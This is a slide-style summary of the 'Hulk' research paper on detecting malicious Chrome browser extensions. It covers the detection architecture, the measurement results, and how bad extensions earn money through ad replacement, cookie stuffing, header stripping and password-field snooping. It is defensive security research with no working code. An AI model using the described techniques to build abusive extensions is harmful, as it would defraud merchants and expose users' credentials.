Hulk: Eliciting Malicious Behavior in Browser Extensions AlexandrosKapravelos◊,Chris Grier†*, NehaChachra‡, Christopher Kruegel◊,Giovanni Vigna◊,VernPaxson†* ◊UC Santa Barbara, †UC Berkeley, ‡UC San Diego*International Computer Science Institute 23rdUSENIX Security Symposium (Aug., 2014)
Outline • Introduction • Background • Architecture • Results • Profiting from maliciousness • Recommendations • Related work
Introduction • All major web browsers today support broad extension ecosystems that allow third parties to install a wide range of modified behavior or additional functionality. • Some browsers have online web stores to distribute extensions to users. • In this paper, we examine extensions for Google Chrome that are designed with malicious intent.
Installing extensions • Extensions can be installed via the official Chrome web store, by user manually, or sideloaded by third-party programs. • Chrome version 25 (Feb.,2013) included changes to prevent silent installation of Chrome extensions, requiring user confirmation. • Chrome version 35 (May, 2014) took further steps to prevent sideloading by requiring all installed extensions to be hosted in the Chrome Web Store.
Extension permissions • Chrome requires extensions to list the permissions needed to access the different parts of the extension API. • webRequest: Allows the extension to "observe and analyze traffic and to intercept, block, or modify requests in- flight"
Architecture • Hulk dynamically loads extensions in a monitored environment and observes the interaction of extensions with the loaded web pages. • Using a set of heuristics to identify potentially dangerous behavior, it labels extensions as malicious, suspicious, or benign. • Automatically install extensions and instrument activity during web browsing using an instrumented browser.
URL extraction • Look for URLs in the manifest, and search for URLs in the source code as well. • Also, visit a set of popular websites which may targeted by the malicious plugin.
Event-based execution • HoneyPages will not trigger callbacks for network events that require special properties, such as a specific URL or HTTP header. • By invoking all event callbacks that an extension registers in the chrome.webRequest API with mock event objects and pointing to a background HoneyPage, we can monitor changes extensions attempts to make.
Content scripts • By intercepting all additional code introduced by the extension in the context of the visited page, we can monitor if the extension fetch remote scripts.
Network logging • Request URLs may be computed in at runtime. • We use a transparent proxy that intercepts all browser HTTP and DNS traffic to log the requests made during extension execution.
Detecting malicious behavior • Extension API: • Uninstalling other extensions • Preventing uninstallation of the current extension(blocking chrome://extensions) • Manipulating HTTP headers by eemoving security-related HTTP header, such as Content-Security-Policy or X-Frame-Options is classified as malicious.
Network level • Request errors (suspicious). • May be used for drive-by downloads. • Modification of HTTP requests(malicious). • Common seen on shopping-related extensions. • Detect header modification by comparing packets received by the OS and by the browser.
Injected Content Analysis • The injected script runs in the context of the visited page and thus has full access to its DOM tree. • By using HoneyPages, we can understand the injected scripts’ intentions. • For example, if the injected code looks for a form field with the name “password,” it is classified as malicious.
Results • Two sources of extensions: • The official Chrome Web Store (totaling 47,940 extensions) • Extensions sideloaded by binaries. (392 unique extensions)(Anubis) • Hulk labeled 130 as malicious and 4,712 as suspicious. • Benign extensions do not differ significantly from permissions requested by malicious/suspicious ones.
Permissions used • Most commonly used permissions:
Permissions used • 18,313 extensions that use host permissions to restrict on which pages the extension can use the privileged chrome.* API. • Extensions typically request broad permissions using wildcards in URL patterns.
API calls • Top 15 Chrome Extension API calls made during by extensions during the experiments.
Extension management • Several extensions on the Chrome Web Store prevent uninstallation. • “HD Video Player” (7,173 users). • “SmartScreenVideo Plugin” (11,012 users). • “No Tab Left Behind” (only 8 users)(false positive).
Code injection • More than 3,000 extensions that dynamically introduced remotely-retrieved code either through script injections or by evoking eval. • An extension named “Bang5TaoShopping assistant” (5.6M users) injects code into every visited page.
Profiting from maliciousness • Ad Manipulation: • The addition of new ads as well as the replacement of existing ads or identifiers with the same size images. • “SimilarSites Pro” (1.8M users), used obfuscated scripts to replace ads (728x90) in popular websites. • Other similar scripts, all under a company called “SimilarGroup.”
Profiting from maliciousness • Affiliate Fraud: • Many major merchant web sites such as amazon.com, godaddy.com, and ebay.com run affiliate programs. • Affiliate programs usually associate a cookie with the user’s browser. • Malicious extensions do “cookie stuffing” — a technique that causes the user’s browser to visit the merchant URLs without the user clicking on affiliate URLs. • “*Split Screen*” (52K users), sets the referrer header for requests. • “Give as you Live” (11K users), however, is a charity campaign.
Profiting from maliciousness • Information theft • Online social network abuse: • Extensions use existing authentication data to interact with online social networks. • “WhasApp”, an extension spams Facebook and Tumblr, sideloaded by malware.
Recommendations • Extensions should not have the ability to manipulate browser configuration pages, such as chrome://extensions. • Extensions should also not be allowed to uninstall other extensions. • Extensions should not be allowed to remove HTTP security-related headers. • Extensions should not have the ability to hook all keyboard events on a given site.
Limitations • Hulk uses dynamic analysis for analyzing extensions. • Can not address cloaking that loads different code based on the client’s location or time. • Can not observe behavior that depends on specific targets. • Hulk’s HoneyPagesdo not currently support multistep querying of DOM elements.
Related work • Anubis, malware analysis for unknown binaries. • Further work has examined the success of the Chrome extension architecture at preventing damage and the ability of developers to correctly request privileges for their extensions. • Current permission system does not prevent an overtly privileged malicious extension from executing malicious code. • Adware vendor may purchase an extension, update it with malicious one.